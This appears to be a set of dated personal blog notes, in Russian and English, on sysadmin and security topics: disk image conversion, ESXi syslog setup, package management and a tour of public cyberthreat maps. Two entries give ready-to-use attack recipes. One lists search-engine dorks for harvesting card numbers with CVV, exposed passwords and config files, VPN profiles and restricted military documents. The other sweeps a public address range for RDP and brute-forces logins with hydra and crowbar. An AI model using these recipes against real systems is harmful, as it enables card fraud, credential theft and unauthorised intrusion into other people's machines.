28.07.2015

convert qcow2 vmdk

 [from qcow2 to vmdk]
qemu-img convert -f qcow2 -O vmdk whatever.qcow2 whatever.vmdk
[from qcow2 to raw]
qemu-img convert -f qcow2 kvm_source.img -O raw kvm_destination.img 

Syslog Servers for ESXi [esxcli]


1. Enable ESXi Firewall

You will need to enable the syslog rule in the ESXi firewall (only in ESXi 5.0):

$ esxcli --server esxi1 --username root network firewall ruleset set --enabled yes --ruleset-id syslog

Note: The default syslog ruleset allows UDP/TCP 514 and TCP 1514, if you choose to use a different port you will need to update firewall ruleset.

2. Configure Syslog Servers

To specify more than one syslog server, you will need to separate them using a comma. By default, the host will use UDP protocol and port 514. However, you can specify tcp or ssl as the protocol to be used as well as the port number:

$ esxcli --server esxi1 --username root system syslog config set --loghost 
10.20.182.46,tcp://10.20.182.50:514,ssl://10.20.182.52:1514

Note: You can also authenticate against vCenter Server by specifying the --vihost parameter
3. Reload Syslog Configuration

For the syslog configuration to take effect, you will need to reload the configuration:

$ esxcli --server esxi1 --username root system syslog reload

configSyslog.sh

#!/bin/bash
# William Lam
# http://blogs.vmware.com/vsphere/automation/

PASSWORD=

if [[ $# -ne 3 ]]; then
 echo -e "\nUsage: $0 [USERNAME] [HOSTLIST] [SYSLOG_SERVERS]\n"
 exit 1
fi

if [ -z ${PASSWORD} ]; then
 echo -e "You forgot to set the password in the script!\n"
 exit 1
fi

24.07.2015

google search [заметка]


allintext: card number expiration date /2017 cvv (поиск совпадений на странице по значению)

inurl:nasa.gov filetype:xlsx "address" (списки,люди,адреса)

"DISTRIBUTION STATEMENT C" inurl:navy.mil  (конфид.доки на домене)

allinurl:ftp:// verizon.net 
(«приватные» ссылки на публично опубликованные данные,(подставляем нужный домен))

"pwd=" "UID=" ext:inc (публичные конфиг файлы)

intext:DB_PASSWORD filetype:env (открытые конфиги баз данных)

filetype:reg HKEY_CURRENT_USER "Password"= 
(на серверах Windows место конфигурационных файлов отчасти занял реестр)

filetype:xls inurl:password (логичный запрос:) )

confidential filetype:pdf daterange:2457024-2457205
(список документов PDF со словом confidential, загруженных c 1 января по 1 июля 2015 года.)
(конвертер дат http://www.onlineconversion.com/julian_date.htm)

intitle:"Index of /Personal/" -names -tutorial -banking

filetype:pcf vpn OR Group
(http://thecampusgeeks.com/ пассворд декриптор)
(файл конфигурации Cisco VPN, у которого довольно нестандартное расширение PCF и узнаваемый путь: Program Files\Cisco Systems\VPNClient\Profiles)

22.07.2015

Debian/RHEL поиск и удаление пакетов [заметка]

Вывести состояние установки пакетов, содержащих в имени строку (или регулярное выражение) «foo*»: dpkg --list 'foo*'

В Red Hat/Fedora Core/CentOS Linux- подобных наберите следующую команду чтобы получить список установленных программ
# rpm -qa | less
#rpm -e foo

В Debian Linux список установленных пакетов можно увидеть так:
# dpkg --get-selections

Удалить пакет (но не его файлы настроек): dpkg --remove foo
Удалить пакет (вместе с файлами настроек): dpkg --purge foo

14.07.2015

Nmap port scan [save ip list] + crack RDP (brute) [crowbar.py + hydra]

Nmap scan network(save ip list)
For crowbar.py :
#nmap -p3389 -P0 -sS 213.11.1.0/24 | grep "scan" | grep "(" | cut -d "(" -f2 | cut -d ")" -f1 | sed 's/$/\/32/g' > iplist.txt

For hydra:
#nmap -p3389 -P0 -sS 213.11.1.0/24 | grep "scan" | grep "(" | cut -d "(" -f2 | cut -d ")" -f1  > iplist.txt

#Masscan:
#masscan 213.11.1.0/24 -p3389 |awk '{print $6}' > iplist.txt

//....
https://github.com/galkan/crowbar
# apt-get install openvpn freerdp-x11 vncviewer
#git clone https://github.com/galkan/crowbar
//....

Brute

#hydra -t 4 -L /root/users.txt -P /root/brute/little.txt -M /root/iplist.txt -o good.txt rdp
or
#./crowbar.py -v -b rdp -S /root/iplist.txt -U /root/users.txt -C /root/brute/little.txt

alt tag


13.07.2015

[Cyberthreat Maps]

«Find out where you are on the Cyberthreat map» или «Узнай, где сейчас кипит кибервойна»
Начнем с отечественного ресурса, детища лаборатории Касперского — проект Узнай, где сейчас кипит кибервойна.
Визуализация очень красочная и удобная для просмотра, поэтому залипать на «Земной шар» можно долго (не забудьте запастись чаем).

«Norse Live Attack Map»
Однажды, крупная американская компания Norse поставила кучу ханипотов и с открытыми портами и прочими плюшками и сделала ресурс Norse Live Attack Map, где показала, что весь мир «дербанит» их ханипоты (особенно Китай).
Даже крупный новостной портал Daily Mail в своей статье ссылался на ресурс Norse Live Attack Map (стоит отдать должное — в статье фигурирует и отечественный продукт лаборатории Касперского).

Norse Live Attack Map
На самом деле стоит отметить этот ресурс — выполнен качественно, красиво и реально можно почерпнуть полезную информацию для себя. Так что залипать можно очень долго.

«Top Daily DDoS Attacks Worldwide»
Ресурс Top Daily DDoS Attacks Worldwide от корпорации Google тоже не отстает в наглядности от своих конкурентов — все также залипательно, информативно. Заодно есть и галерея «красивых атак» и выборка новостей по атакам.

«Cyber Threat Map by FireEye»
И еще один ресурс от крупной компании FireEye Cyber Threat Map.
Карта сама по себе менее информативная, однако тоже красочная, да и к тому же, можно подписаться на рассылку — будете в курсе крупных атак)

«Security Tachometer by Deutsche Telekom»
Security Tachometer от крупнейшей в Европе телекоммуникационной компании Deutsche Telekom.
Немного бледновато-скучноватый вид ресурса отпугивает, но и в нем есть плюсы — несколько видов статистики. А еще они предлагают помочь ресурсу и установить сенсоры для отслеживания активности атак.

«Cyberfeed Live Botnet Map by AnubisNetworks»
Проект Cyberfeed Live Botnet Map от компании AnubisNetworks показывает нам статистику заражений, приводя рейтинг ботнетов (zeus, andromeda и прочие).

«Real-time Web Monitor by Akamai»
Ребята с компании Akamai тоже не отстают — сервис Real-time Web Monitor тому доказательство.

Кстати, у них есть и другие визуальные карты и графы

«Global Activity Maps ATLAS»
Проект ATLAS от Arbor Networks.
Очень неплохой сервис, хоть и визуально скуден. зато отчеты по атакам, сканам, ботнетам можно выгружать в разных форматах.

«Global Botnet Threat Activity Map by Trend Micro»
Global Botnet Threat Activity Map от известной компании Trend Micro.
Визуально скудно, пару графиков по ботнетам.

«Internet Malicious Activity Maps by TeamCymru»
Internet Malicious Activity Maps от Team Cymru Research.Ребята сделали мувики по дневной активности — вышло «дешево и сердито».

«F-Secure Global Maps»
Визуально-пестрые карты от компании F-Secure — Globe и VirusMap.

UPDATE v.1.0
«Fortinet Threat Map»
Еще одна неплохая карта атак от компании FortiGuard — FortiNet.
анимация чем-то напоминает игровые автоматы или инди-игры)


«ThreatCloud World Cyber Threat Map»
Новый ресурс от компании CheckPoint — World Cyber Threat Map.
По данной карте замечено, что США усиленно бьет Украину, а Россия — Турцию…

ThreatCloud Map